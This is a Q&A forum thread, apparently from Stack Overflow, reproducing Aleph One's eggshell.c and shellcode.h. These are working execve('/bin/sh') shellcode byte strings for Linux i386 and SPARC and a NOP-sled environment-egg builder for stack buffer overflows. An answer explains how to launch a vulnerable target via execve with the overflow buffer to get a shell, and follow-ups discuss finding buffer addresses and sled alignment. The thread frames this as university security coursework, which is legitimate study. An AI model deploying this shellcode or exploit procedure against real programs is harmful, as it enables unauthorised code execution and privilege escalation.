
I got this code from Aleph One:

shellcode.h

#if defined(__i386__) && defined(__linux__)

/* Platform-specific byte strings consumed by eggshell.c. NOP_SIZE is the width
 * in bytes of the filler instruction held in nop[]. Both arrays are plain
 * (non-static) definitions placed in a header, so including this file from more
 * than one translation unit produces duplicate-symbol link errors. */
#define NOP_SIZE    1
char nop[] = "\x90";
char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

/* Returns the current stack pointer. There is no return statement: the asm
 * leaves %esp in %eax, the register the i386 calling convention uses for the
 * return value, and the caller picks it up from there. Falling off the end of
 * a non-void function and using the result is undefined behavior in C, and the
 * asm has no clobber list, so this only "works by convention" on a specific
 * compiler, typically without optimization. */
unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");
}

#elif defined(__sparc__) && defined(__sun__) && defined(__svr4__)

/* Solaris (SVR4) on SPARC: four-byte filler instruction, so NOP_SIZE is 4. */
#define NOP_SIZE    4
char nop[]="\xac\x15\xa1\x6e";
char shellcode[] =
  "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e"
  "\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0"
  "\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08"
  "\x90\x1b\xc0\x0f\x82\x10\x20\x01\x91\xd0\x20\x08";

/* Same contract as the i386 version: copies %sp into %i0 and relies on the
 * SPARC register-window convention to make that the caller's return value.
 * Again no return statement, so strictly undefined behavior. */
unsigned long get_sp(void) {
  __asm__("or %sp, %sp, %i0");
}

#elif defined(__sparc__) && defined(__sun__)

/* SunOS (non-SVR4) on SPARC: identical nop[] and get_sp() to the branch above;
 * only the shellcode bytes differ. */
#define NOP_SIZE        4
char nop[]="\xac\x15\xa1\x6e";
char shellcode[] =
  "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e"
  "\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0"
  "\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\xaa\x10\x3f\xff"
  "\x91\xd5\x60\x01\x90\x1b\xc0\x0f\x82\x10\x20\x01\x91\xd5\x60\x01";

unsigned long get_sp(void) {
  __asm__("or %sp, %sp, %i0");
}

/* No #else branch: on any other platform NOP_SIZE, nop, shellcode and get_sp
 * are simply undefined and eggshell.c fails to compile. */
#endif

eggshell.c

/*
 * eggshell v1.0
 *
 * Aleph One / [email protected]
 */
#include <stdlib.h>
#include <stdio.h>
#include "shellcode.h"

/* Defaults for the -o (offset), -b (buffer size) and -e (egg size) options;
 * each may be overridden on the command line, see usage(). */
#define DEFAULT_OFFSET                    0
#define DEFAULT_BUFFER_SIZE             512
#define DEFAULT_EGG_SIZE               2048

/* Prints the command-line synopsis to stderr; defined below main(). */
void usage(void);

/* NOTE(review): `void main` is non-standard; hosted C requires `int main`.
 * getopt()/optarg are declared in <unistd.h> and strlen()/memcpy() in
 * <string.h>; neither header is included above, so all four are implicitly
 * declared here (a constraint violation since C99). */
void main(int argc, char *argv[]) {
  char *ptr, *bof, *egg;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i, n, m, c, align=0, eggsize=DEFAULT_EGG_SIZE;

  /* Option parsing. getopt() is documented to return -1 at the end of the
   * options; comparing against EOF only works because EOF is -1 on the usual
   * implementations. atoi() reports no errors, so a non-numeric or negative
   * argument silently becomes 0 or a negative size that nothing below rejects. */
  while ((c = getopt(argc, argv, "a:b:e:o:")) != EOF)
    switch (c) {
      case 'a':
        align = atoi(optarg);
        break;
      case 'b':
        bsize = atoi(optarg);
        break;
      case 'e':
        eggsize = atoi(optarg);
        break;
      case 'o':
        offset = atoi(optarg);
        break;
      case '?':
        usage();
        exit(0);
    }

  /* Signed/unsigned comparison: strlen() yields size_t, so a negative eggsize
   * converts to a huge unsigned value and passes this check. All error paths in
   * this function exit(0), i.e. report success to the caller. */
  if (strlen(shellcode) > eggsize) {
    printf("Shellcode is larger the the egg.\n");
    exit(0);
  }

  /* A negative bsize/eggsize converts to a huge size_t here and malloc() fails;
   * a zero size is accepted and leads to out-of-bounds writes below. The two
   * buffers are handed to putenv() later and are intentionally never freed. */
  if (!(bof = malloc(bsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }
  if (!(egg = malloc(eggsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }

  /* get_sp() (shellcode.h) has no return statement and relies on compiler
   * convention, so addr is only meaningful on the platforms that header targets. */
  addr = get_sp() - offset;
  printf("[ Buffer size:\t%d\t\tEgg size:\t%d\tAligment:\t%d\t]\n",
    bsize, eggsize, align);
  /* addr is a long but printed with %x (expects unsigned int): a format/argument
   * mismatch, which is undefined behavior; %lx would match the type. */
  printf("[ Address:\t0x%x\tOffset:\t\t%d\t\t\t\t]\n", addr, offset);

  /* Fill bof with repeated copies of addr, 4 bytes per store. This assumes
   * sizeof(long) == 4 (a 32-bit build); if bsize is not a multiple of 4 the last
   * store writes past the end of bof, and a bsize below 4 is always overrun. */
  addr_ptr = (long *) bof;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  /* Fill egg with nop[] bytes, leaving room for the shellcode. The bound is
   * computed in size_t: when eggsize - strlen(shellcode) is smaller than
   * NOP_SIZE the subtraction wraps and the loop writes far beyond egg (heap
   * overflow in this program itself). `align` rotates which byte of a
   * multi-byte nop[] comes first; with NOP_SIZE == 1 it has no effect. */
  ptr = egg;
  for (i = 0; i <= eggsize - strlen(shellcode) - NOP_SIZE; i += NOP_SIZE)
    for (n = 0; n < NOP_SIZE; n++) {
      m = (n + align) % NOP_SIZE;
      *(ptr++) = nop[m];
    }

  /* Append the shellcode bytes after the filler (strlen() re-evaluated every
   * iteration; hoisting it would be cheaper). */
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  /* NUL-terminate both buffers so they are valid C strings for putenv().
   * With a size of 0 either index is -1, an out-of-bounds write. */
  bof[bsize - 1] = '\0';
  egg[eggsize - 1] = '\0';

  /* Overwrite the first four bytes of each buffer so it reads as a NAME=value
   * environment entry. putenv() (POSIX) keeps the pointer it is given rather
   * than copying the string, so the buffers must remain allocated. */
  memcpy(egg,"EGG=",4);
  putenv(egg);

  memcpy(bof,"BOF=",4);
  putenv(bof);
  /* Start an interactive shell; the child inherits the modified environment.
   * system() is invoked here with a fixed, non-user-controlled string. */
  system("/bin/sh");
}

/* Write the command-line synopsis to stderr. */
void usage(void) {
  static const char synopsis[] =
    "usage: eggshell [-a <alignment>] [-b <buffersize>] [-e <eggsize>] [-o <offset>]\n";

  fputs(synopsis, stderr);
}

I'm trying to use this exploit on another vulnerable program, and I understood that I need to start the other vulnerable program through the Aleph One program. Could somebody please tell me how to do that?



Please don't ask about help with malware development here as a refusal, and down/close vote, often offends. – Martin James Dec 9 '15 at 10:00
    
@MartinJames, there are so many questions about malware last time. Any ideas why? – kelin Dec 9 '15 at 10:21
    
why wont ask?? I'm doing this for research, not for anything that will cause damage to someone... the vulnerable program is a program from my studies... – Elad Doocker Dec 9 '15 at 10:45
    
There are, but please understand that it's not a personal issue:) Whenever I see 'buffer overflow', 'exploit', 'vulnerability' etc. I just auto down and close vote. If it has a whiff of malware, I always respond in that manner. ' im doing this for research' - I'm sure you understand that malware developers lie. I'm not saying that you are, but you may be. – Martin James Dec 9 '15 at 10:55
    
All those "shell code" exploits only work on specific environments and with specific compilers. – Michael Walz Dec 9 '15 at 11:06

The question is not about malware development; this is the content of security classes at many universities!

The target program must accept input if you want to run this buffer overflow on it. You start the target program with the execve system call, whose arguments are the location of the program and the arguments array.

You get the address with get_sp() from shellcode.h, you get the shellcode from shellcode.h, and you fill your buffer (which will overflow) inside eggshell.c. Then you start the target program with execve(), giving the buffer as an argument; the overflow will occur, which will open a shell for you.

A sample exploit can be found here and its target is here. It does not use get_sp; the addresses are hardcoded there.

    
Thank you for your help! Can you please tell me if there is any way to find the buffer address without using gdb? Because the program I need to buffer overflow wasn't compiled with the gdb flag... – Elad Doocker Dec 10 '15 at 16:03
    
I got it with gdb; I don't know other ways. – Jemshit Iskenderov Dec 10 '15 at 16:05
    
OK, thanks, and another question: do you know what the use of align is as a parameter in Aleph One's eggshell.c code? – Elad Doocker Dec 12 '15 at 1:08
    
I think it just fills the egg with nop[], starting from the end of nop[] towards the beginning or vice versa. That nop[] with size 4 is for the SPARC system, not for Linux. On Linux the NOP instruction is 0x90. – Jemshit Iskenderov Dec 12 '15 at 9:24
    
Yeah, I know, but his function takes align as one of its parameters; how can I know how many NOPs I need? – Elad Doocker Dec 12 '15 at 10:00
